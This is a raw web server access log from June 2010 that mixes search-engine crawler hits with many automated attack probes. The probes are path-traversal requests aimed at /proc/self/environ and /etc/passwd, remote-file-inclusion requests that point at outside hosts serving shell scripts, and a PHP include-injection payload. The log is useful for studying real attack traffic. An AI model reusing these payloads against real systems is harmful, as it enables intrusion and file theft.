78.46.70.228 - - [12/Jun/2010:19:00:03 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 294 "-""Mozilla/5.0"
78.46.70.228 - - [12/Jun/2010:19:00:03 -0500] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 299 "-""Mozilla/5.0"
78.46.70.228 - - [12/Jun/2010:19:00:03 -0500] "GET /logs/access_log.1274572800//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 321 "-""Mozilla/5.0"
78.46.70.228 - - [12/Jun/2010:19:00:03 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.46.70.228 - - [12/Jun/2010:19:00:03 -0500] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
78.46.70.228 - - [12/Jun/2010:19:00:03 -0500] "GET /logs/access_log.1274572800//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
78.46.70.228 - - [12/Jun/2010:19:00:03 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 294 "-"""
78.46.70.228 - - [12/Jun/2010:19:00:03 -0500] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 299 "-"""
78.46.70.228 - - [12/Jun/2010:19:00:03 -0500] "GET /logs/access_log.1274572800//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 321 "-"""
78.46.70.228 - - [12/Jun/2010:19:00:03 -0500] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-"""
78.46.70.228 - - [12/Jun/2010:19:00:03 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-"""
78.46.70.228 - - [12/Jun/2010:19:00:04 -0500] "GET /logs/access_log.1274572800//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-"""
207.46.204.239 - - [12/Jun/2010:19:04:06 -0500] "GET /logs/access_log.1213660800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [12/Jun/2010:19:04:49 -0500] "GET /logs/access_log.1159401600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.106.183.116 - - [12/Jun/2010:19:08:39 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.106.183.116 - - [12/Jun/2010:19:08:39 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
207.58.183.16 - - [12/Jun/2010:19:08:41 -0500] "GET /logs//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
207.58.183.16 - - [12/Jun/2010:19:08:41 -0500] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
87.106.183.116 - - [12/Jun/2010:19:08:54 -0500] "GET /logs//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.106.183.116 - - [12/Jun/2010:19:08:54 -0500] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.106.183.116 - - [12/Jun/2010:19:09:02 -0500] "GET /logs//index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.106.183.116 - - [12/Jun/2010:19:09:02 -0500] "GET //index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.106.183.116 - - [12/Jun/2010:19:09:33 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.106.183.116 - - [12/Jun/2010:19:09:33 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
74.124.198.60 - - [12/Jun/2010:19:09:47 -0500] "GET /logs/access_log.1272067200//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 387 "-""Mozilla/5.0"
74.124.198.60 - - [12/Jun/2010:19:09:47 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
74.124.198.60 - - [12/Jun/2010:19:09:47 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
87.106.183.116 - - [12/Jun/2010:19:09:59 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.106.183.116 - - [12/Jun/2010:19:09:59 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.250.255.243 - - [12/Jun/2010:19:10:10 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Yandex/1.01.001 (compatible; Win16; I)"
74.124.198.60 - - [12/Jun/2010:19:10:25 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
74.124.198.60 - - [12/Jun/2010:19:10:25 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
74.124.198.60 - - [12/Jun/2010:19:10:25 -0500] "GET /logs/access_log.1272067200//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 387 "-""Mozilla/5.0"
207.58.183.16 - - [12/Jun/2010:19:12:55 -0500] "GET /logs/access_log.1274572800//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
207.58.183.16 - - [12/Jun/2010:19:12:56 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
207.58.183.16 - - [12/Jun/2010:19:12:56 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
209.126.254.102 - - [12/Jun/2010:19:12:58 -0500] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.76"
209.126.254.102 - - [12/Jun/2010:19:12:58 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.76"
209.126.254.102 - - [12/Jun/2010:19:15:16 -0500] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.76"
209.126.254.102 - - [12/Jun/2010:19:15:16 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.76"
121.78.118.123 - - [12/Jun/2010:19:17:07 -0500] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
121.78.118.123 - - [12/Jun/2010:19:17:07 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
66.249.71.144 - - [12/Jun/2010:19:20:24 -0500] "GET /logs/access_log.1271030400 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
62.80.164.185 - - [12/Jun/2010:19:22:43 -0500] "GET /skin/rosun2005P_shop_s5/setup.php?dir=http://www.pdd.co.kr/bbs/script/id1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
62.80.164.185 - - [12/Jun/2010:19:22:43 -0500] "GET /logs/access_log.1271548800/skin/rosun2005P_shop_s5/setup.php?dir=http://www.pdd.co.kr/bbs/script/id1.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
62.80.164.185 - - [12/Jun/2010:19:22:43 -0500] "GET /logs/skin/rosun2005P_shop_s5/setup.php?dir=http://www.pdd.co.kr/bbs/script/id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
207.46.199.46 - - [12/Jun/2010:19:24:07 -0500] "GET /logs/access_log.1169856000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
195.93.201.141 - - [12/Jun/2010:19:25:44 -0500] "GET /index.php?option=com_arcadegames&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""-"
195.93.201.141 - - [12/Jun/2010:19:25:44 -0500] "GET /logs/index.php?option=com_arcadegames&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""-"
195.93.201.141 - - [12/Jun/2010:19:25:44 -0500] "GET /index.php?option=com_arcadegames&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 293 "-""-"
195.93.201.141 - - [12/Jun/2010:19:25:44 -0500] "GET /logs/index.php?option=com_arcadegames&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 298 "-""-"
62.80.164.185 - - [12/Jun/2010:19:28:03 -0500] "GET /skin/rosun2005P_shop_s5/setup.php?dir=http://www.pdd.co.kr/bbs/script/id1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
62.80.164.185 - - [12/Jun/2010:19:28:03 -0500] "GET /logs/access_log.1271548800/skin/rosun2005P_shop_s5/setup.php?dir=http://www.pdd.co.kr/bbs/script/id1.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
62.80.164.185 - - [12/Jun/2010:19:28:03 -0500] "GET /logs/skin/rosun2005P_shop_s5/setup.php?dir=http://www.pdd.co.kr/bbs/script/id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
74.124.198.60 - - [12/Jun/2010:19:28:41 -0500] "GET /logs/access_log.1272067200//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 387 "-""Mozilla/5.0"
74.124.198.60 - - [12/Jun/2010:19:28:41 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
74.124.198.60 - - [12/Jun/2010:19:28:41 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
74.124.198.60 - - [12/Jun/2010:19:28:41 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
74.124.198.60 - - [12/Jun/2010:19:28:41 -0500] "GET /logs/access_log.1272067200//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 387 "-""Mozilla/5.0"
74.124.198.60 - - [12/Jun/2010:19:28:41 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
74.124.198.60 - - [12/Jun/2010:19:28:41 -0500] "GET /logs/access_log.1272585600//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 387 "-""Mozilla/5.0"
74.124.198.60 - - [12/Jun/2010:19:28:41 -0500] "GET /logs/access_log.1272585600//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 387 "-""Mozilla/5.0"
74.124.198.60 - - [12/Jun/2010:19:28:44 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
74.124.198.60 - - [12/Jun/2010:19:28:44 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
74.124.198.60 - - [12/Jun/2010:19:28:44 -0500] "GET /logs/access_log.1272067200//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 387 "-""Mozilla/5.0"
74.124.198.60 - - [12/Jun/2010:19:28:44 -0500] "GET /logs/access_log.1272585600//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 387 "-""Mozilla/5.0"
174.133.201.194 - - [12/Jun/2010:19:32:08 -0500] "GET /logs/*.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
174.133.201.194 - - [12/Jun/2010:19:32:08 -0500] "GET /*.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
202.130.32.19 - - [12/Jun/2010:19:32:51 -0500] "GET /logs/*.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
202.130.32.19 - - [12/Jun/2010:19:32:52 -0500] "GET /*.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
207.46.204.230 - - [12/Jun/2010:19:34:06 -0500] "GET /logs/access_log.1235174400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.37.143.198 - - [12/Jun/2010:19:51:43 -0500] "GET /logs//include/write.php?dir=http://warnetanggrek.com/gambar/sh.pdf?? HTTP/1.1" 404 307 "-""libwww-perl/5.834"
174.37.143.198 - - [12/Jun/2010:19:51:43 -0500] "GET /logs//include/write.php?dir==http://www.kortech.cn/bbs//skin/zero_vote/sh.txt?????? HTTP/1.1" 404 307 "-""libwww-perl/5.834"
174.37.143.198 - - [12/Jun/2010:19:51:43 -0500] "GET //include/write.php?dir=http://warnetanggrek.com/gambar/sh.pdf?? HTTP/1.1" 404 302 "-""libwww-perl/5.834"
174.37.143.198 - - [12/Jun/2010:19:51:43 -0500] "GET //include/write.php?dir==http://www.kortech.cn/bbs//skin/zero_vote/sh.txt?????? HTTP/1.1" 404 302 "-""libwww-perl/5.834"
174.37.143.198 - - [12/Jun/2010:19:51:44 -0500] "GET /logs//include/write.php?dir=http://warnetanggrek.com/gambar/sh.pdf?? HTTP/1.1" 404 307 "-""libwww-perl/5.834"
174.37.143.198 - - [12/Jun/2010:19:51:44 -0500] "GET /logs//include/write.php?dir==http://www.kortech.cn/bbs//skin/zero_vote/sh.txt?????? HTTP/1.1" 404 307 "-""libwww-perl/5.834"
174.37.143.198 - - [12/Jun/2010:19:51:44 -0500] "GET //include/write.php?dir=http://warnetanggrek.com/gambar/sh.pdf?? HTTP/1.1" 404 302 "-""libwww-perl/5.834"
174.37.143.198 - - [12/Jun/2010:19:51:44 -0500] "GET //include/write.php?dir==http://www.kortech.cn/bbs//skin/zero_vote/sh.txt?????? HTTP/1.1" 404 302 "-""libwww-perl/5.834"
174.37.143.198 - - [12/Jun/2010:19:51:48 -0500] "GET /logs//include/write.php?dir=http://warnetanggrek.com/gambar/sh.pdf?? HTTP/1.1" 404 307 "-""libwww-perl/5.834"
174.37.143.198 - - [12/Jun/2010:19:51:48 -0500] "GET /logs//include/write.php?dir==http://www.kortech.cn/bbs//skin/zero_vote/sh.txt?????? HTTP/1.1" 404 307 "-""libwww-perl/5.834"
174.37.143.198 - - [12/Jun/2010:19:51:49 -0500] "GET //include/write.php?dir=http://warnetanggrek.com/gambar/sh.pdf?? HTTP/1.1" 404 302 "-""libwww-perl/5.834"
174.37.143.198 - - [12/Jun/2010:19:51:49 -0500] "GET //include/write.php?dir==http://www.kortech.cn/bbs//skin/zero_vote/sh.txt?????? HTTP/1.1" 404 302 "-""libwww-perl/5.834"
216.97.233.20 - - [12/Jun/2010:19:53:49 -0500] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.833"
216.97.233.20 - - [12/Jun/2010:19:53:49 -0500] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
67.195.112.180 - - [12/Jun/2010:19:55:18 -0500] "GET /logs/access_log.1271376000 HTTP/1.0" 200 664329 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.37.143.198 - - [12/Jun/2010:19:58:58 -0500] "GET /logs/config.php?path_to_root=http://www.privateinterlude.com//forum/1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
174.37.143.198 - - [12/Jun/2010:19:58:58 -0500] "GET /config.php?path_to_root=http://www.privateinterlude.com//forum/1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
174.37.143.198 - - [12/Jun/2010:19:58:58 -0500] "GET /logs/access_log.1274227200/config.php?path_to_root=http://www.privateinterlude.com//forum/1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.195.112.180 - - [12/Jun/2010:20:04:52 -0500] "GET /logs/access_log.1156291200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.13.88 - - [12/Jun/2010:20:07:36 -0500] "GET /logs/access_log.1256860800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.200.244.57 - - [12/Jun/2010:20:18:03 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
209.200.244.57 - - [12/Jun/2010:20:18:03 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.195.112.180 - - [12/Jun/2010:20:25:28 -0500] "GET /logs/access_log.1265155200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [12/Jun/2010:20:25:49 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [12/Jun/2010:20:34:49 -0500] "GET /logs/access_log.1271116800 HTTP/1.0" 200 614646 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
208.115.111.248 - - [12/Jun/2010:20:44:36 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
209.200.244.57 - - [12/Jun/2010:20:57:16 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
209.200.244.57 - - [12/Jun/2010:20:57:16 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
109.71.41.45 - - [12/Jun/2010:20:58:04 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.823"
109.71.41.45 - - [12/Jun/2010:20:58:04 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
72.52.150.147 - - [12/Jun/2010:21:11:54 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.aceinfosearch.com//config/xml/.logs? HTTP/1.1" 404 302 "-""libwww-perl/5.831"
72.52.150.147 - - [12/Jun/2010:21:11:55 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.aceinfosearch.com//config/xml/.logs? HTTP/1.1" 404 297 "-""libwww-perl/5.831"
72.52.150.147 - - [12/Jun/2010:21:12:21 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.aceinfosearch.com//config/xml/.logs? HTTP/1.1" 404 297 "-""libwww-perl/5.831"
72.47.211.173 - - [12/Jun/2010:21:15:01 -0500] "GET /logs/access_log.1274572800//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
72.47.211.173 - - [12/Jun/2010:21:15:01 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
72.47.211.173 - - [12/Jun/2010:21:15:01 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
72.47.211.173 - - [12/Jun/2010:21:15:11 -0500] "GET /logs/access_log.1274832000//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
194.54.88.38 - - [12/Jun/2010:21:15:37 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
194.54.88.38 - - [12/Jun/2010:21:15:37 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
95.131.67.183 - - [12/Jun/2010:21:16:20 -0500] "GET /logs///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
95.131.67.183 - - [12/Jun/2010:21:16:21 -0500] "GET ///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
123.243.67.208 - - [12/Jun/2010:21:17:10 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
72.52.150.147 - - [12/Jun/2010:21:17:26 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.aceinfosearch.com//config/xml/.logs? HTTP/1.1" 404 324 "-""libwww-perl/5.831"
72.52.150.147 - - [12/Jun/2010:21:17:27 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.aceinfosearch.com//config/xml/.logs? HTTP/1.1" 404 297 "-""libwww-perl/5.831"
72.52.150.147 - - [12/Jun/2010:21:17:27 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.aceinfosearch.com//config/xml/.logs? HTTP/1.1" 404 302 "-""libwww-perl/5.831"
123.243.67.208 - - [12/Jun/2010:21:19:38 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
72.52.150.147 - - [12/Jun/2010:21:20:44 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.aceinfosearch.com//config/xml/.logs? HTTP/1.1" 404 324 "-""libwww-perl/5.831"
72.52.150.147 - - [12/Jun/2010:21:20:44 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.aceinfosearch.com//config/xml/.logs? HTTP/1.1" 404 297 "-""libwww-perl/5.831"
72.52.150.147 - - [12/Jun/2010:21:20:44 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.aceinfosearch.com//config/xml/.logs? HTTP/1.1" 404 302 "-""libwww-perl/5.831"
208.115.111.248 - - [12/Jun/2010:21:21:22 -0500] "GET /logs/access_log.1215993600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [12/Jun/2010:21:21:23 -0500] "GET /logs/access_log.1216080000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [12/Jun/2010:21:21:25 -0500] "GET /logs/access_log.1216252800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [12/Jun/2010:21:21:27 -0500] "GET /logs/access_log.1216339200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [12/Jun/2010:21:21:29 -0500] "GET /logs/access_log.1216512000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [12/Jun/2010:21:21:31 -0500] "GET /logs/access_log.1216598400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [12/Jun/2010:21:21:33 -0500] "GET /logs/access_log.1216684800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
59.126.201.241 - - [12/Jun/2010:21:21:33 -0500] "GET /logs/access_log.1219276800 HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
59.126.201.241 - - [12/Jun/2010:21:21:35 -0500] "GET /logs/access_log.1219795200 HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
208.115.111.248 - - [12/Jun/2010:21:21:35 -0500] "GET /logs/access_log.1216771200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [12/Jun/2010:21:21:37 -0500] "GET /logs/access_log.1216857600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [12/Jun/2010:21:21:40 -0500] "GET /logs/access_log.1216944000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
